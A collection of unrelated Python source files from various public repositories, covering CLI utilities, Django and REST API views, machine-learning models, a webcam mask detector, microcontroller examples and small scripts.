|
SamuelNunesDev/starting_point_in_python
|
|
|
from datetime import date
d = dict()
d["Nome"] = input('Nome: ')
d["Idade"] = int(input('Ano de nascimento: '))
d["Idade"] = date.today().year - d["Idade"]
d["CTPS"] = int(input('CTPS: (0 não tem)'))
if d["CTPS"] != 0:
d["Ano de contratação"] = int(input('Ano de contratação: '))
d["Salario"] = float(input('Salário: R$'))
d["Aposentadoria"] = d["Idade"] + 35
for k, v in d.items():
if k in 'Salario':
print(f'{k}: R${v:.2f}')
elif k in 'Aposentadoria':
print(f'{k}: {v} anos')
else:
print(f'{k}: {v}')
else:
for k, v in d.items():
print(f'{k}: {v}')
|
|
examples/Ni__eam__born_exp_fs/preconditioning_3.5NN/test__configuration_file.py
|
|
|
|
import pytest
from pypospack.pyposmat.data import PyposmatConfigurationFile
configuration_fn = 'data/pyposmat.config.in'
config = PyposmatConfigurationFile()
config.read(filename=configuration_fn)
print(config.sampling_type)
print(config.configuration['sampling_type'])
|
|
src/scvmm/azext_scvmm/scvmm_utils.py
|
haroonf/azure-cli-extensions
|
|
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.azclierror import InvalidArgumentValueError
from azure.cli.core.commands.client_factory import get_subscription_id
from msrestazure.tools import is_valid_resource_id, resource_id
from azext_scvmm.scvmm_constants import (
EXTENDED_LOCATION_TYPE,
)
from .vendored_sdks.models import (
ExtendedLocation,
)
def get_resource_id(
cmd,
resource_group_name: str,
provider_name_space: str,
resource_type: str,
resource: str,
):
"""
Gets the resource id for the resource if name is given.
"""
if resource is None or is_valid_resource_id(resource):
return resource
return resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace=provider_name_space,
type=resource_type,
name=resource,
)
def create_dictionary_from_arg_string(values, option_string=None):
"""
Creates and returns dictionary from a string containing params in KEY=VALUE format.
"""
params_dict = {}
for item in values:
try:
key, value = item.split('=', 1)
params_dict[key.lower()] = value
except ValueError as err:
raise InvalidArgumentValueError(
f'usage error: {option_string} KEY=VALUE [KEY=VALUE ...]'
) from err
return params_dict
def get_extended_location(custom_location):
return ExtendedLocation(
type=EXTENDED_LOCATION_TYPE,
name=custom_location,
)
|
|
|
enade-istyastono/PyPLIF-HIPPOS
|
|
|
#!/usr/bin/env python
from __future__ import print_function
import sys
from time import time
from initialize.parse_conf import parse_config
from ifp_processing import get_bitstring
from similarity import count_abcdp, how_similar
def replace_bit_char(bitstring, bit_index_list):
for i, v in enumerate(bit_index_list):
if v == 1:
bitstring = bitstring[:i] + "n" + bitstring[i+1:]
return bitstring
def main():
x = time()
"""
Steps:
1. Read HIPPOS config file
2. Read docking config file
3. Get docking result
4. Get bitstring by analyzing docking result
5. Write basic info to log and output file
6. Write bitstring (and similarity) to output file
"""
hippos_config = parse_config()
logfile = open(hippos_config["logfile"], "w") # Output #4
"""
Parse docking configuration file
Get docking results:
protein ==> OBMol Object
docked_ligands ==> List of OBMol
docked_proteins ==> List of OBMol (only for PLANTS)
mollist ==> List of ligand name + pose number
scorelist ==> List of docking score
"""
if hippos_config["docking_method"] == "plants":
from initialize.parse_docking_conf import parse_plants_conf
docking_conf = hippos_config["docking_conf"]
docking_results = parse_plants_conf(docking_conf)
else:
from initialize.parse_docking_conf import parse_vina_conf
docking_conf = hippos_config["docking_conf"]
docking_results = parse_vina_conf(docking_conf)
# checking docking output, if not found then exit.
if len(docking_results["docked_ligands"]) == 0:
missing_docking_output = (
"The docking output could not be found. Please check your docking result."
)
print(missing_docking_output)
logfile.write(missing_docking_output)
logfile.close()
sys.exit(1)
"""
Get Bitstring using docking results & hippos configuration
bitstrings ==> Dictionary, with resname as key
Residue object as value
"""
bitstrings = get_bitstring(docking_results, hippos_config)
# Write Output & Log files
scorelist = docking_results["scorelist"]
ligand_pose = []
if hippos_config["docking_method"] == "plants":
for mol in docking_results["mollist"]:
mol = mol.split("_")
new_name = mol[0] + "_" + mol[-1]
ligand_pose.append(new_name)
if hippos_config["docking_method"] == "vina":
ligand_pose = docking_results["mollist"]
# set flag for every chosen output mode
output_mode = hippos_config["output_mode"]
simplified_flag = output_mode["simplified"]
full_flag = output_mode["full"]
full_nobb_flag = output_mode["full_nobb"]
# set file handler for every chosen output mode
if simplified_flag:
simplified_outfile = open(hippos_config["simplified_outfile"], "w") # Output #1
if full_flag:
full_outfile = open(hippos_config["full_outfile"], "w") # Output #2
if full_nobb_flag:
full_nobb_outfile = open(hippos_config["full_nobb_outfile"], "w") # Output #3
# write ligand info and similarity coef info
logfile.write(
"Ligand name is %s with %s poses\n\n"
% (ligand_pose[0].split("_")[0], len(ligand_pose))
) # Output Logfile
similarity_coef = hippos_config["similarity_coef"]
if similarity_coef:
sim_outfile = open(hippos_config["sim_outfile"], "w") # Output #5
logfile.write(
"similarity coefficient used are %s\n" % (", ".join(similarity_coef))
) # Output Logfile
# if simplified then write the length and position for each bitstring
if simplified_flag:
logfile.write(
"%s %s %s %s\n" % ("RESNAME", "length", "startbit", "endbit")
) # Output Logfile
# Iterate through pose and write the ligand+pose, docking score,
# similarity coef, bitstring
log_flag = True
bitstring_zero = False
for pose, (ligand_name, score) in enumerate(zip(ligand_pose, scorelist)):
ligand_name = ligand_name.replace(" ", "_").ljust(16)
score = score.ljust(9)
simp_bits = ""
full_bits = ""
nobb_bits = ""
# Concatenate bitstring from every residue, then write to their respective
# output file
bit_start = 1
for resname in hippos_config["residue_name"]:
bit_replace_index = bitstrings[resname].bit_replace_index
simp_bit_replace_index = bitstrings[resname].simp_bit_replace_index
if simplified_flag:
simp_res_bit = bitstrings[resname].simp_bits_list[pose].to01()
if bool(sum(simp_bit_replace_index)):
simp_res_bit = replace_bit_char(simp_res_bit, simp_bit_replace_index)
simp_bits += simp_res_bit
if full_flag:
full_res_bit = bitstrings[resname].full_bits_list[pose].to01()
if bool(sum(bit_replace_index)):
full_res_bit = replace_bit_char(full_res_bit, bit_replace_index)
full_bits += full_res_bit
if full_nobb_flag:
nobb_res_bit = bitstrings[resname].full_nobb_list[pose].to01()
if bool(sum(bit_replace_index)):
nobb_res_bit = replace_bit_char(nobb_res_bit, bit_replace_index)
nobb_bits += nobb_res_bit
if log_flag & simplified_flag:
bitlength = len(simp_res_bit)
bit_end = bit_start + bitlength - 1
logfile.write(
"%-10s %-6s %-7s %s\n" % (resname, bitlength, bit_start, bit_end)
) # Output Logfile
bit_start += bitlength
log_flag = False
if simplified_flag:
simplified_outfile.write("%s %s %s\n" % (ligand_name, score, simp_bits))
if full_flag:
full_outfile.write("%s %s %s\n" % (ligand_name, score, full_bits))
if full_nobb_flag:
full_nobb_outfile.write("%s %s %s\n" % (ligand_name, score, nobb_bits))
# If similarity coef requested => calculate abcd and p
if similarity_coef:
abcdp_list = []
coefficient = []
if full_flag:
for full in hippos_config["full_ref"]:
abcdp_list.append(count_abcdp(full, full_bits))
elif full_nobb_flag:
for nobb in hippos_config["full_nobb_ref"]:
abcdp_list.append(count_abcdp(nobb, nobb_bits))
else:
for simp in hippos_config["simplified_ref"]:
abcdp_list.append(count_abcdp(simp, simp_bits))
for sim_coef in similarity_coef:
for abcdp in abcdp_list:
similarity_value = how_similar(abcdp, sim_coef)
try:
coefficient.append("%.3f" % similarity_value)
except TypeError:
coefficient.append("%s" % similarity_value)
bitstring_zero = True
sim_outfile.write(
"%s %s\n" % (ligand_name, " ".join(coefficient))
) # Output Similarity
# Close all file
if simplified_flag:
simplified_outfile.close()
if full_flag:
full_outfile.close()
if full_nobb_flag:
full_nobb_outfile.close()
if similarity_coef:
sim_outfile.close()
y = time()
z = y - x
if bitstring_zero:
bitstring_error = """
It appears that one of the target or reference bitstring is zero,
Check the ligand pose that generate 'NA' value.
"""
print(bitstring_error)
logfile.write(bitstring_error)
print("Total time taken %.3f s." % z)
logfile.write("\nTotal time taken %.3f s." % z)
logfile.close()
if __name__ == "__main__":
main()
|
|
src/utils/accelerator/core.py
|
iaeiou/awesome-hugo-themes
|
|
|
# -*- coding: utf-8 -*-
# Time : 2021/10/3 8:59
# Author : QIN2DIM
# Github : https://github.com/QIN2DIM
# Description:
import gevent
from gevent.queue import Queue
class CoroutineSpeedup:
def __init__(self, work_q: Queue = None, task_docker=None, power: int = None, debug: bool = True):
# 任务容器:queue
self.work_q = work_q if work_q else Queue()
self.done_q = Queue()
# 任务容器:迭代器
self.task_docker = task_docker
# 协程数
self.power = power
# 是否打印日志信息
self.debug_logger = debug
# 任务队列满载时刻长度
self.max_queue_size = 0
def launch(self):
while not self.work_q.empty():
task = self.work_q.get_nowait()
self.control_driver(task)
def control_driver(self, task):
"""
rewrite this method
@param task:
@return:
"""
def preload(self):
"""
:return:
"""
def offload_task(self):
"""
@return:
"""
if self.task_docker:
for task in self.task_docker:
self.work_q.put_nowait(task)
self.max_queue_size = self.work_q.qsize()
def killer(self):
"""
@return:
"""
pass
def go(self, power: int = 8) -> None:
"""
@param power: 协程功率
@return:
"""
# 任务重载
self.preload()
self.offload_task()
task_list = []
# 配置弹性采集功率
power_ = self.power if self.power else power
if self.max_queue_size != 0:
power_ = self.max_queue_size if power_ > self.max_queue_size else power_
self.power = power_
# 任务启动
for _ in range(power_):
task = gevent.spawn(self.launch)
task_list.append(task)
gevent.joinall(task_list)
# 缓存回收
self.killer()
|
|
|
|
|
|
# coding: utf-8
'''Fauzi, <EMAIL>'''
from app.model import db, CRUD
class Role(db.Model, CRUD):
__tablename__ = 'role'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(250), nullable=True, unique=True)
description = db.Column(db.String(250))
user = db.relationship('User', backref='role', lazy='dynamic')
def __repr__(self):
return '<Role %s>' % self.name
|
|
|
|
|
|
from bicubic_pytorch import core
from config import get_config
from model import common
import torch
from torch import nn
from torch.nn import init
class VDSR(nn.Module):
def __init__(
self,
depth: int=20,
n_colors: int=3,
n_feats: int=64,
conv=common.default_conv) -> None:
super().__init__()
m = []
block = lambda x, y: common.BasicBlock(x, y, 3)
m.append(block(n_colors, n_feats))
for _ in range(depth - 2):
m.append(block(n_feats, n_feats))
m.append(conv(n_feats, n_colors, 3))
self.convs = nn.Sequential(*m)
for m in self.modules():
if isinstance(m, nn.Conv2d):
init.kaiming_normal_(m.weight)
m.bias.data.fill_(0)
return
@staticmethod
def get_kwargs(cfg, conv=common.default_conv) -> dict:
parse_list = ['depth', 'n_colors', 'n_feats']
kwargs = get_config.parse_namespace(cfg, *parse_list)
kwargs['conv'] = conv
return kwargs
def forward(self, x: torch.Tensor, scale: float) -> torch.Tensor:
with torch.no_grad():
x = core.imresize(x, scale=scale, kernel='cubic')
x = x + self.convs(x)
return x
|
|
S4/S4 Decompiler/decompyle3/parsers/reducecheck/__init__.py
|
|
|
|
from decompyle3.parsers.reducecheck.and_check import *
from decompyle3.parsers.reducecheck.and_cond_check import *
from decompyle3.parsers.reducecheck.and_not_check import *
from decompyle3.parsers.reducecheck.break38 import *
from decompyle3.parsers.reducecheck.if_and_stmt import *
from decompyle3.parsers.reducecheck.if_and_elsestmt import *
from decompyle3.parsers.reducecheck.ifelsestmt import *
from decompyle3.parsers.reducecheck.iflaststmt import *
from decompyle3.parsers.reducecheck.ifstmt import *
from decompyle3.parsers.reducecheck.ifstmts_jump import *
from decompyle3.parsers.reducecheck.for38 import *
from decompyle3.parsers.reducecheck.lastc_stmt import *
from decompyle3.parsers.reducecheck.list_if_not import *
from decompyle3.parsers.reducecheck.not_or_check import *
from decompyle3.parsers.reducecheck.or_check import *
from decompyle3.parsers.reducecheck.or_cond_check import *
from decompyle3.parsers.reducecheck.pop_return import *
from decompyle3.parsers.reducecheck.testtrue import *
from decompyle3.parsers.reducecheck.c_tryelsestmt import *
from decompyle3.parsers.reducecheck.tryexcept import *
from decompyle3.parsers.reducecheck.while1elsestmt import *
from decompyle3.parsers.reducecheck.while1stmt import *
from decompyle3.parsers.reducecheck.whilestmt import *
|
|
dataset/correct_h5_name.py
|
vuhoangminh/medical-segmentation
|
|
|
import os
import glob
from unet3d.utils.path_utils import get_project_dir, get_h5_training_dir
from brats.config import config
CURRENT_WORKING_DIR = os.path.realpath(__file__)
PROJECT_DIR = get_project_dir(CURRENT_WORKING_DIR, config["project_name"])
BRATS_DIR = os.path.join(PROJECT_DIR, config["brats_folder"])
DATASET_DIR = os.path.join(PROJECT_DIR, config["dataset_folder"])
for h5_path in glob.glob(os.path.join(BRATS_DIR, "database", "*", "*.h5")):
# print(h5_path)
print("old name:", h5_path)
if "norm-minh" in h5_path:
new_name = h5_path.replace("norm-minh", "norm-01_hist-1")
if "norm-z" in h5_path:
new_name = h5_path.replace("norm-z", "norm-z-old_hist-0")
print(">> rename to:", new_name)
os.rename(h5_path, new_name)
|
|
哥伦布(STM32F407)/1.基础实验/2.流水灯/v2.0/main.py
|
01studio-lab/MicroPython_Examples
|
|
|
'''
实验名称:流水灯
版本:v2.0
日期:2020.12
作者:01Studio
'''
from pyb import LED,delay #从pyb导入LED模块
# 相当于for i in [2, 3, 4],LED(i).off()执行3次,分别是LED 2,3,4
for i in range(2,5):
LED(i).off()
while True:
#使用for循环
for i in range(2,5):
LED(i).on()
delay(1000) #延时1000毫秒,即1秒
LED(i).off()
|
|
src/python/entity_align/utils/PrintBestResults.py
|
amnda-d/learned-string-alignments
|
|
|
"""
Copyright (C) 2017-2018 University of Massachusetts Amherst.
This file is part of "learned-string-alignments"
http://github.com/iesl/learned-string-alignments
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import json
import os
from collections import defaultdict
from entity_align.utils.Config import Config
if __name__ == "__main__":
file_of_scores = sys.argv[1]
only_best = True if len(sys.argv) > 2 and sys.argv[2] == "True" else False
score_objs = []
with open(file_of_scores, 'r') as fin:
for line in fin:
js = json.loads(line.strip())
c = Config()
c.__dict__ = js['config']
js['config'] = c
score_objs.append(js)
for js in score_objs:
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "MAP", js['map']))
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@1", js['hits_at_1']))
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@10", js['hits_at_10']))
print("{}\t{}\t{}\t{}".format(js['config'].model_name, js['config'].dataset_name, "HITS@50", js['hits_at_50']))
|
|
python/kata/5-kyu/RGB To Hex Conversion/main.py
|
Carlososuna11/codewars-handbook
|
|
|
import codewars_test as test
from solution import rgb
test.assert_equals(rgb(0,0,0),"000000", "testing zero values")
test.assert_equals(rgb(1,2,3),"010203", "testing near zero values")
test.assert_equals(rgb(255,255,255), "FFFFFF", "testing max values")
test.assert_equals(rgb(254,253,252), "FEFDFC", "testing near max values")
test.assert_equals(rgb(-20,275,125), "00FF7D", "testing out of range values")
|
|
|
dimst23/RadioTelescope_CommandLine
|
|
|
#!/usr/local/bin/python
import User_Interface
import configData
import TCPClient
import logData
import sys
if __name__ == '__main__':
#Exception handling section for the log file code
try:
logdata = logData.logData(__name__)
except:
print("There is a problem with the handling of the log file. See log file for the traceback of the exception.\n")
logdata.log("EXCEPT", "There is a problem with the handling of the log file. Program terminates.", __name__)
exit(1) #Terminate the script
#Exception handling code for the XML file process
try:
cfgData = configData.confData("settings.xml")
except:
print("There is a problem with the XML file handling. See log file for the traceback of the exception.\n")
logdata.log("EXCEPT", "There is a problem with the XML file handling. Program terminates.", __name__)
exit(1) #Terminate the script
#Exception handling code for the TCP initial setup
try:
tcpClient = TCPClient.TCPClient(cfgData)
except:
print("There is a problem with the TCP handling. See log file for the traceback of the exception.\n")
logdata.log("EXCEPT", "There is a problem with the TCP handling. Program terminates.", __name__)
exit(1) #Terminate the script
#General exception handling code
try:
User_Interface.uInterface(cfgData, tcpClient) #Initiate the user interface
except KeyboardInterrupt:
print("User requested termination with a keyboard interrupt.\n")
logdata.log("EXCEPT", "User requested termination with a keyboard interrupt.", __name__)
tcpClient.disconnect()
exit(0) #Terminate the script
except:
print("Something really bad happened!! We should terminate.\n")
logdata.log("EXCEPT", "Something really bad happened!! See the traceback below.", __name__)
exit(1) #Terminate the script
logdata.logClose() #Terminate all logging operations before exiting the script
|
|
|
|
|
|
import re
import os
from ratelimit.decorators import ratelimit
from iBird import settings
from apps.prediction.neural_network.predict_server import NeuralNetwork
from apps.utils.decorator import RequiredMethod, RequiredParameters, Protect
from apps.utils.response_processor import process_response
from apps.utils.response_status import ResponseStatus, ValueErrorStatus
from apps.prediction import models as prediction_models
# 识别网络
net = NeuralNetwork(settings.MODEL_PATH, settings.CLASSES_PATH)
@Protect
@RequiredMethod('POST')
@ratelimit(**settings.RATE_LIMIT_LEVEL_1)
@RequiredParameters('path')
def predict(request):
json_data = request.json_data
status = ValueErrorStatus.check_value_type(json_data)
if status is not None:
return process_response(request, status)
path = json_data['path']
if len(path) > 100 or re.search(r'\.\.', path) or path[:9] != '/' + settings.PICTURE_PATH \
or not os.path.exists('.' + path):
return process_response(request, ResponseStatus.IMAGE_PATH_NOT_FOUND_ERROR)
report = prediction_models.Report.objects.filter(path=path).first()
if not report:
report = prediction_models.Report(path=path)
report.result = net.predicted('.' + path)
report.save()
request.data = report.transform_into_serialized_data()
return process_response(request, ResponseStatus.OK)
@Protect
@RequiredMethod('GET')
@ratelimit(**settings.RATE_LIMIT_LEVEL_3)
def get_report(request):
sequence = request.GET.get('sequence')
if not sequence:
return process_response(request, ResponseStatus.SEQUENCE_REQUIRED_ERROR)
status = ValueErrorStatus.check_value_type({'sequence': sequence})
if status is not None:
return process_response(request, status)
sequence = int(sequence)
report = prediction_models.Report.objects.filter(id=sequence).first()
if not report:
return process_response(request, ResponseStatus.REPORT_NOT_EXISTED_ERROR)
request.data = report.transform_into_serialized_data()
return process_response(request, ResponseStatus.OK)
@Protect
@RequiredMethod('GET')
@ratelimit(**settings.RATE_LIMIT_LEVEL_3)
def get_bird_info(request):
bird_id = request.GET.get('bird_id')
if not bird_id:
return process_response(request, ResponseStatus.BIRD_ID_REQUIRED_ERROR)
status = ValueErrorStatus.check_value_type({'bird_id': bird_id})
if status is not None:
return process_response(request, status)
bird_id = int(bird_id)
if not 1 <= bird_id <= 200:
return process_response(request, ResponseStatus.BIRD_ID_NOT_EXISTED_ERROR)
bird = prediction_models.Bird.objects.filter(id=bird_id).first()
request.data = bird.transform_into_serialized_data()
return process_response(request, ResponseStatus.OK)
|
|
scripts/npc/backToVictoria.py
|
|
|
|
map = 104020000
if sm.getFieldID() != 120040000:
map = 120040000
if sm.sendAskYesNo("Would you like to go to #m" + str(map) + "#?"):
sm.warp(map, 0)
|
|
gnosis/catalog/views/views_people.py
|
|
|
|
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render
from catalog.models import Person, Paper
from catalog.forms import PersonForm
from catalog.forms import SearchPeopleForm
from django.urls import reverse
from django.http import HttpResponseRedirect
from neomodel import db
from django.shortcuts import redirect
from django.contrib import messages
def _person_find(person_name, exact_match=False):
"""
Searches the DB for a person whose name matches the given name
:param person_name:
:return:
"""
person_name = person_name.lower()
person_name_tokens = [w for w in person_name.split()]
if exact_match:
if len(person_name_tokens) > 2:
query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } AND LOWER(p.first_name) IN { person_tokens } AND LOWER(p.middle_name) IN { person_tokens } RETURN p LIMIT 20"
else:
query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } AND LOWER(p.first_name) IN { person_tokens } RETURN p LIMIT 20"
else:
query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } OR LOWER(p.first_name) IN { person_tokens } OR LOWER(p.middle_name) IN { person_tokens } RETURN p LIMIT 20"
results, meta = db.cypher_query(query, dict(person_tokens=person_name_tokens))
if len(results) > 0:
print("Found {} matching people".format(len(results)))
people = [Person.inflate(row[0]) for row in results]
return people
else:
return None
def person_find(request):
"""
Searching for a person in the DB.
:param request:
:return:
"""
print("Calling person_find")
people_found_ids = []
message = None
storage = messages.get_messages(request=request)
for request_message in storage:
people_found_ids = request_message.message
print("IDs of people found: {}".format(people_found_ids))
people_found_ids = people_found_ids.split(",")
break
people = []
if len(people_found_ids) > 0:
people = Person.nodes.filter(uid__in=people_found_ids)
print("Retrieved {} people from the database".format(len(people)))
if request.method == "POST":
form = SearchPeopleForm(request.POST)
print("Received POST request")
if form.is_valid():
people = _person_find(form.cleaned_data["person_name"])
if people is not None:
return render(request, "person_find.html", {"people": people, "form": form, "message": message})
else:
message = "No results found. Please try again!"
elif request.method == "GET":
print("Received GET request")
form = SearchPeopleForm()
return render(request, "person_find.html", {"people": people, "form": form, "message": message})
#
# Person Views
#
def persons(request):
people = Person.nodes.order_by("-created")[:50]
message = None
if request.method == "POST":
form = SearchPeopleForm(request.POST)
print("Received POST request")
if form.is_valid():
print("Valid form")
people_found = _person_find(form.cleaned_data["person_name"])
if people_found is not None:
#print("Found people. Rendering person_find.html")
people_found_ids = [person.uid for person in people_found]
#print("ids as string {}".format(",".join(str(pid) for pid in people_found_ids)))
messages.add_message(request, messages.INFO, ",".join(str(pid) for pid in people_found_ids))
return redirect("person_find")
# return render(
# request,
# "person_find.html",
# {"people": people_found, "form": form, "message": ""},
# )
else:
message = "No results found. Please try again!"
elif request.method == "GET":
print("Received GET request")
form = SearchPeopleForm()
return render(
request, "people.html", {"people": people, "form": form, "message": message}
)
def person_detail(request, id):
# Retrieve the paper from the database
papers_authored = []
query = "MATCH (a) WHERE ID(a)={id} RETURN a"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
# There should be only one results because ID should be unique. Here we check that at
# least one result has been returned and take the first result as the correct match.
# Now, it should not happen that len(results) > 1 since IDs are meant to be unique.
# For the MVP we are going to ignore the latter case and just continue but ultimately,
# we should be checking for > 1 and failing gracefully.
all_people = [Person.inflate(row[0]) for row in results]
person = all_people[0]
else: # go back to the paper index page
return render(
request,
"people.html",
{"people": Person.nodes.all(), "num_people": len(Person.nodes.all())},
)
#
# Retrieve all papers co-authored by this person and list them
#
query = "MATCH (a:Person)-[r:authors]->(p:Paper) where id(a)={id} return p"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
papers_authored = [Paper.inflate(row[0]) for row in results]
print("Number of papers co-authored by {}: {}".format(person.last_name, len(papers_authored)))
for p in papers_authored:
print("Title: {}".format(p.title))
else:
print("No papers found for author {}".format(person.last_name))
request.session["last-viewed-person"] = id
return render(request, "person_detail.html", {"person": person, "papers": papers_authored})
@login_required
def person_create(request):
user = request.user
if request.method == "POST":
person = Person()
person.created_by = user.id
form = PersonForm(instance=person, data=request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse("persons_index"))
else: # GET
form = PersonForm()
return render(request, "person_form.html", {"form": form})
@login_required
def person_update(request, id):
# retrieve paper by ID
# https://github.com/neo4j-contrib/neomodel/issues/199
query = "MATCH (a) WHERE ID(a)={id} RETURN a"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
all_people = [Person.inflate(row[0]) for row in results]
person_inst = all_people[0]
else:
person_inst = Person()
# if this is POST request then process the Form data
if request.method == "POST":
form = PersonForm(request.POST)
if form.is_valid():
person_inst.first_name = form.cleaned_data["first_name"]
person_inst.middle_name = form.cleaned_data["middle_name"]
person_inst.last_name = form.cleaned_data["last_name"]
person_inst.affiliation = form.cleaned_data["affiliation"]
person_inst.website = form.cleaned_data["website"]
person_inst.save()
return HttpResponseRedirect(reverse("persons_index"))
# GET request
else:
query = "MATCH (a) WHERE ID(a)={id} RETURN a"
results, meta = db.cypher_query(query, dict(id=id))
if len(results) > 0:
all_people = [Person.inflate(row[0]) for row in results]
person_inst = all_people[0]
else:
person_inst = Person()
form = PersonForm(
initial={
"first_name": person_inst.first_name,
"middle_name": person_inst.middle_name,
"last_name": person_inst.last_name,
"affiliation": person_inst.affiliation,
"website": person_inst.website,
}
)
return render(request, "person_update.html", {"form": form, "person": person_inst})
# should limit access to admin users only!!
@staff_member_required
def person_delete(request, id):
print("WARNING: Deleting person id {} and all related edges".format(id))
# Cypher query to delete the paper node
query = "MATCH (p:Person) WHERE ID(p)={id} DETACH DELETE p"
results, meta = db.cypher_query(query, dict(id=id))
return HttpResponseRedirect(reverse("persons_index"))
|
|
programs/testing with cam.py
|
Anurag-Varma/face-recognition-with-and-without-mask
|
|
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 15 20:01:17 2020
@author: panur
"""
import cv2
import numpy as np
from keras.models import model_from_json
from keras.preprocessing.image import img_to_array
#load model
model = model_from_json(open("fer.json", "r").read())
#load weights
model.load_weights('fer.h5')
detection_model_path="C:/Users/panur/facedetection/haarcascade_frontalface_default.xml"
face_detection = cv2.CascadeClassifier(detection_model_path)
video="C:/Users/panur/Downloads/withmask_1602-18-737-006.mp4"
ret=1
flag=True
cap = cv2.VideoCapture(1)
#frameRate = cap.get(30)
while(ret!=0 and cap.isOpened()):
ret, fm=cap.read()
cv2.imwrite('live_test_img.jpg', fm)
fm = cv2.resize(fm, (200, 200))
file = cv2.cvtColor(fm, cv2.COLOR_BGR2RGB)
orig_frame = file
frame = file
faces = face_detection.detectMultiScale(frame,scaleFactor=1.1,minNeighbors=5,minSize=(30,30),flags=cv2.CASCADE_SCALE_IMAGE)
i=0
test=""
if (len(faces)) :
faces = sorted(faces, reverse=True,key=lambda x: (x[2] - x[0]) * (x[3] - x[1]))[0]
(fX, fY, fW, fH) = faces
roi = frame[fY:fY + fH, fX:fX + fW]
roi = cv2.resize(roi, (200, 200),3)
roi = frame.astype("float") / 255.0
roi = img_to_array(roi)
roi = np.expand_dims(roi, axis=0)
preds=model.predict_classes(roi)[0]
print(preds)
if preds==0:
print("withmask_anurag"+str(i))
test='withmask_anurag'
elif preds==10:
print("withoutmask_anurag"+str(i))
test='withoutmask_anurag'
i=i+1
cv2.putText(fm,test, (fX-15, fY - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
cv2.rectangle(fm, (fX, fY), (fX + fW, fY + fH),(0, 0, 255), 2)
file=fm
cv2.imshow("Live Video", fm)
k=cv2.waitKey(25)
if k == 27:
ret=0
break
print("closed")
cap.release()
cv2.destroyAllWindows()
|
|
marklogic/models/database/ruleset.py
|
paul-hoehne/MarkLogic_Python
|
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2015 MarkLogic Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0#
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File History
# ------------
#
# <NAME> 05/10/2015 Initial development
"""
Classes for dealing with rulesets.
"""
class RuleSet:
"""
A database rule set.
"""
def __init__(self, location):
"""
Create a rule set.
:param location: the ruleset location
"""
self._config = {
'location': location
}
def location(self):
"""
The location.
"""
return self._config['location']
def set_location(self, location):
"""
Set the location.
"""
self._config['location'] = location
return self
|
|
api/views/parking_slot.py
|
santiagoSSAA/ParkingLot_Back
|
|
|
""" Contains Parking Slot endpoint definition """
from cerberus import Validator
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from ..helpers.token import TokenHandler
from ..helpers.paginator import paginate_content
from ..models.parking_slot import ParkingSlot
from ..serializers.parking_slot import ParkingSlotSerializer
from ..serializers.parking_slot import ParkingSlotClientSerializer
class ParkingSlotApi(APIView, TokenHandler):
""" Defines the HTTP verbs to parking slot model management. """
def post(self, request):
""" Create a parking slot.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
validator = Validator({"place_code": {"required": True,
"type": "string"}})
if not validator.validate(request.data):
return Response({
"code": "invalid_body",
"detailed": "cuerpo inválido",
"data": validator.errors
}, status=status.HTTP_400_BAD_REQUEST)
if ParkingSlot.objects.filter(
place_code=request.data.get("place_code").upper(),is_active=True):
return Response({
"code": "slot_already_exists",
"code": "Estacionamiento ya registrado"
},status=status.HTTP_409_CONFLICT)
request.data["place_code"] = request.data["place_code"].upper()
slot = ParkingSlot.objects.create(**request.data)
return Response({"created": slot.pk}, status=status.HTTP_201_CREATED)
@paginate_content()
def get(self, request):
""" Retrieve a list of slots.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
validator = Validator({
"place_code": {"required": False,"type": "string"},
"status": {"required": False, "type": "string",
"allowed": ["Ocupado", "Disponible"]}
})
if not validator.validate(request.GET):
return Response({
"code": "invalid_filtering_params",
"detailed": "Parámetros de búsqueda inválidos",
"data": validator.errors
}, status=status.HTTP_400_BAD_REQUEST)
query = {}
if request.GET.get("place_code"):
query["place_code"] = request.GET.get("place_code")
if user.profile == "client":
query["is_active"] = True
slots = ParkingSlot.objects.filter(**query)
if slots and request.GET.get("status"):
slots = [slot.id for slot in slots
if slot.get_status() == request.GET.get("place_code")]
slots = ParkingSlot.objects.filter(pk__in=slots)
